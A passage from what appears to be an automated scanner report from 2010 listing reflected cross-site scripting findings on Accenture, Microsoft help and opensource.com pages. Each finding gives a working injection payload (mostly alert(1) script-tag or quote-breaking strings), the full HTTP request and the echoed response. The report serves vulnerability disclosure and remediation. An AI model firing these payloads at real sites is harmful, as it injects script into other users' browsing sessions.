This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article_display.cfm?article_id=5052&458c4</script><a>52134726541=1 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 17:16:35 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=26120585;expires=Tue, 13-Nov-2040 17:16:35 GMT;path=/
Set-Cookie: CFTOKEN=d1fa5982b84c7a66-6F6FED08-A45D-F5A5-C8FDCF2C84F550B2;expires=Tue, 13-Nov-2040 17:16:35 GMT;path=/
Set-Cookie: DARKSITE=0;expires=Sat, 21-Nov-2009 17:16:35 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.charSet="ISO-8859-1"
s.pageName="newsroom/article_display.cfm?article_id=5052&458c4</script><a>52134726541=1"
s.channel="accenture/newsroom/pressreleases"
s.server="http://www.accenture.com"

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.wri
...[SNIP]...

1.119. http://newsroom.accenture.com/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://newsroom.accenture.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 595e2</script><a>14a24e4e77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.cfm?595e2</script><a>14a24e4e77=1 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 17:16:41 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=26120677;expires=Tue, 13-Nov-2040 17:16:41 GMT;path=/
Set-Cookie: CFTOKEN=89da660ce5284372-6F70045D-EBF8-57A0-BF02033B5C5232A5;expires=Tue, 13-Nov-2040 17:16:41 GMT;path=/
Set-Cookie: DARKSITE=0;expires=Sat, 21-Nov-2009 17:16:41 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.charSet="ISO-8859-1"
s.pageName="newsroom/index.cfm?595e2</script><a>14a24e4e77=1"
s.channel="accenture/newsroom/home"
s.server="http://www.accenture.com"

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code
...[SNIP]...

1.120. http://newsroom.accenture.com/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://newsroom.accenture.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec10a"><a>31f449be3b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /index.cfm?ec10a"><a>31f449be3b9=1 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 17:16:23 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=26120414;expires=Tue, 13-Nov-2040 17:16:23 GMT;path=/
Set-Cookie: CFTOKEN=34fb8bfd8c1ef11e-6F6FBEAD-FF5D-27A0-90D78F19A6897076;expires=Tue, 13-Nov-2040 17:16:23 GMT;path=/
Set-Cookie: DARKSITE=0;expires=Sat, 21-Nov-2009 17:16:23 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<input type="hidden" name="new_path_info" value="/index.cfm?ec10a"><a>31f449be3b9=1">
...[SNIP]...

1.121. http://newsroom.accenture.com/login.cfm [path_info parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newsroom.accenture.com
Path:   /login.cfm

Issue detail

The value of the path_info request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74f0a"style%3d"x%3aexpression(alert(1))"137df798c96 was submitted in the path_info parameter. This input was echoed as 74f0a"style="x:expression(alert(1))"137df798c96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login.cfm?path_info=%2F404%2Ecfm%3F404%3Bhttp%3A%2F%2Fnewsroom%2Eaccenture%2Ecom%3A80%2Fpr%2Bcontacts%2F74f0a"style%3d"x%3aexpression(alert(1))"137df798c96 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 17:16:32 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=26120557;expires=Tue, 13-Nov-2040 17:16:32 GMT;path=/
Set-Cookie: CFTOKEN=9aded3106d407836-6F6FE240-FD00-0E61-D0D4AFB8729474EE;expires=Tue, 13-Nov-2040 17:16:32 GMT;path=/
Set-Cookie: DARKSITE=0;expires=Sat, 21-Nov-2009 17:16:32 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<input type="hidden" name="new_path_info" value="/404.cfm?404;http://newsroom.accenture.com:80/pr+contacts/74f0a"style="x:expression(alert(1))"137df798c96">
...[SNIP]...

1.122. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808535.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35a39"><script>alert(1)</script>c3378771fa8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-US/bing/ff808535.aspx?35a39"><script>alert(1)</script>c3378771fa8=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAADxBQAAeDkgSY5AxVbdEUS04pPjkw!!&M=1; domain=.microsoft.com; expires=Wed, 21-Nov-2040 18:08:20 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 21-Nov-2040 18:08:20 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 21 Nov 2010 18:08:20 GMT
Content-Length: 43682


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx?35a39"><script>alert(1)</script>c3378771fa8=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.123. http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opensource.com
Path:   /education/10/11/three-unspoken-blockers-preventing-open-source-participation

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload beb2d"-alert(1)-"36f5ca8f95c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /educationbeb2d"-alert(1)-"36f5ca8f95c/10/11/three-unspoken-blockers-preventing-open-source-participation HTTP/1.1
Host: opensource.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 21 Nov 2010 18:09:05 GMT
Server: Apache
Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=pot4a6kt25c09k94qncm5jc6o4; expires=Tue, 14-Dec-2010 21:42:25 GMT; path=/; domain=.opensource.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 21 Nov 2010 18:09:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<!--
s.pageName="opensource|blocks404";
s.server="";
s.channel="opensource";
s.pageType="";
s.prop1="";
s.campaign="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar23="http://opensource.com/educationbeb2d"-alert(1)-"36f5ca8f95c/10/11/three-unspoken-blockers-preventing-open-source-participation";
s.events="";
s.products="";
s.state="";
s.zip="";
s.purchaseID="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! *********
...[SNIP]...

1.124. http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opensource.com
Path:   /education/10/11/three-unspoken-blockers-preventing-open-source-participation

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d87f0"-alert(1)-"42d3f0ecc9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /education/10d87f0"-alert(1)-"42d3f0ecc9f/11/three-unspoken-blockers-preventing-open-source-participation HTTP/1.1
Host: opensource.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 21 Nov 2010 18:09:16 GMT
Server: Apache
Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=1q1ubnusk38f0gl7vmlnq37m64; expires=Tue, 14-Dec-2010 21:42:36 GMT; path=/; domain=.opensource.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 21 Nov 2010 18:09:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<!--
s.pageName="opensource|blocks404";
s.server="";
s.channel="opensource";
s.pageType="";
s.prop1="";
s.campaign="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar23="http://opensource.com/education/10d87f0"-alert(1)-"42d3f0ecc9f/11/three-unspoken-blockers-preventing-open-source-participation";
s.events="";
s.products="";
s.state="";
s.zip="";
s.purchaseID="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! ************
...[SNIP]...

1.125. http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opensource.com
Path:   /education/10/11/three-unspoken-blockers-preventing-open-source-participation

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cada1"-alert(1)-"ddab8f1f4c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /education/10/11cada1"-alert(1)-"ddab8f1f4c6/three-unspoken-blockers-preventing-open-source-participation HTTP/1.1
Host: opensource.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 21 Nov 2010 18:09:24 GMT
Server: Apache
Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=dmbh5vkijghseefsmfk4jgg127; expires=Tue, 14-Dec-2010 21:42:44 GMT; path=/; domain=.opensource.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 21 Nov 2010 18:09:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
!--
s.pageName="opensource|blocks404";
s.server="";
s.channel="opensource";
s.pageType="";
s.prop1="";
s.campaign="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar23="http://opensource.com/education/10/11cada1"-alert(1)-"ddab8f1f4c6/three-unspoken-blockers-preventing-open-source-participation";
s.events="";
s.products="";
s.state="";
s.zip="";
s.purchaseID="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
...[SNIP]...

1.126. http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opensource.com
Path:   /education/10/11/three-unspoken-blockers-preventing-open-source-participation

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 118ea"-alert(1)-"e6e7e121cd3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /education/10/11/three-unspoken-blockers-preventing-open-source-participation118ea"-alert(1)-"e6e7e121cd3 HTTP/1.1
Host: opensource.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 21 Nov 2010 18:09:32 GMT
Server: Apache
Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=mmrp8cuki6bgac3rvbrkn1bkd2; expires=Tue, 14-Dec-2010 21:42:52 GMT; path=/; domain=.opensource.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 21 Nov 2010 18:09:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
="opensource";
s.pageType="";
s.prop1="";
s.campaign="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar23="http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation118ea"-alert(1)-"e6e7e121cd3";
s.events="";
s.products="";
s.state="";
s.zip="";
s.purchaseID="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
//-->
...[SNIP]...

1.127. http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opensource.com
Path:   /education/10/11/three-unspoken-blockers-preventing-open-source-participation

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f7ca"-alert(1)-"b0c201e8db0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /education/10/11/three-unspoken-blockers-preventing-open-source-participation?9f7ca"-alert(1)-"b0c201e8db0=1 HTTP/1.1
Host: opensource.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 18:08:57 GMT
Server: Apache
Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=4m9kr84ic388b0m1la5a3sabd6; expires=Tue, 14-Dec-2010 21:42:17 GMT; path=/; domain=.opensource.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 21 Nov 2010 18:08:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 73176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
"opensource";
s.pageType="";
s.prop1="";
s.campaign="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar23="http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation?9f7ca"-alert(1)-"b0c201e8db0=1";
s.events="";
s.products="";
s.state="";
s.zip="";
s.purchaseID="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
//-->
...[SNIP]...

1.128. http://www.accenture.com/accenture/search/search.aspx [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11cca"><script>alert(1)</script>fc0af4dfab4 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture11cca"><script>alert(1)</script>fc0af4dfab4&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:37 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 67197


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
n-US&banner=3EFEDDE7-C822-466D-A267-A21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture11cca"><script>alert(1)</script>fc0af4dfab4&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchb
...[SNIP]...

1.129. http://www.accenture.com/accenture/search/search.aspx [filter parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

The value of the filter request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 146f3"><script>alert(1)</script>2ce8741c39d was submitted in the filter parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accenture/search/search.aspx?filter=1146f3"><script>alert(1)</script>2ce8741c39d&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:32 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 67197


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
er=3EFEDDE7-C822-466D-A267-A21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1146f3"><script>alert(1)</script>2ce8741c39d&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" >
...[SNIP]...

1.130. http://www.accenture.com/accenture/search/search.aspx [getfields parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

The value of the getfields request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 211ce"><script>alert(1)</script>d579d659514 was submitted in the getfields parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accenture/search/search.aspx?filter=1&getfields=*211ce"><script>alert(1)</script>d579d659514&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:33 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 67196


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
C822-466D-A267-A21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*211ce"><script>alert(1)</script>d579d659514&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" >
...[SNIP]...

1.131. http://www.accenture.com/accenture/search/search.aspx [ie parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

